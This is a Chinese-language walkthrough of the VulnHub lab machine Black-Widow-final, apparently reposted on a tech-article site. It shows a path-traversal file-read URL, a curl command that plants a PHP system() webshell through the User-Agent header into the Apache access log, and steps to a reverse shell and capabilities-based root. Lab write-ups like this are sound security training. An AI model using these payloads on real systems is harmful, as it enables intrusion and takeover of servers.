• 首页 首页 icon
  • 工具库 工具库 icon
    • IP查询 IP查询 icon
  • 内容库 内容库 icon
    • 快讯库 快讯库 icon
    • 精品库 精品库 icon
    • 问答库 问答库 icon
  • 更多 更多 icon
    • 服务条款 服务条款 icon

vulnhub靶场:Black-Widow-final

武飞扬头像
冯·诺依曼
帮助1

1.信息收集

探测存活主机,发现192.168.239.177存活
学新通
对目标主机192.168.239.177进行端口扫描,发现存活22、80、111、2049、3128等端口
学新通
在浏览器中访问http://192.168.239.177,并查看源码,未发现有用的信息
学新通
对http://192.168.239.177进行目录扫描,发现/company目录
学新通
查看源码发现有参数file,存在文件读取漏洞,但没有反应
学新通
学新通

对http://192.168.239.177/company继续进行目录扫描,发现存在/started.php
学新通
在浏览器中输入http://192.168.239.177/company/started.php?file=../../../../../../../../../../../../../etc/passwd,读取成功
学新通

2.漏洞利用

看到搭建的第三方插件为apache,并且有文件读取漏洞,想到将一句话木马写入到日志中,并利用文件读取漏洞进行getshell。
先探测日志的路径为/var/log/apache2/access.log。
学新通
之后将木马以User-agent的写入access.log之中,输入 curl -A '<?php system($_GET[shell]);?>' http://192.168.239.177
学新通
在浏览器中输入:http://192.168.239.177/company/started.php?file=…/…/…/…/…/…/…/…/…/…/…/…/…/var/log/apache2/access.log&shell=id,执行命令成功
学新通
反弹shell
学新通
学新通

3.提权

查看发先在/var/baclups中,存在auth.log日志文件,auth.log日志文件是用户登录及身份认证日志,可能存在用户名的密码。
学新通
查看日志发现用户名密码可能是?V1p3r2020!?。
学新通
尝试ssh登录成功。
学新通
上传linpeas.sh进行提权信息收集。
学新通
学新通
查看123.txt发现存在capabilities提权
学新通
学新通
使用capabilities提权为root权限
学新通

这篇好文章是转载于:学新通技术网

  • 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
  • 本站站名: 学新通技术网
  • 本文地址: /boutique/detail/tanhgaejij
系列文章
更多 icon
同类精品
更多 icon
继续加载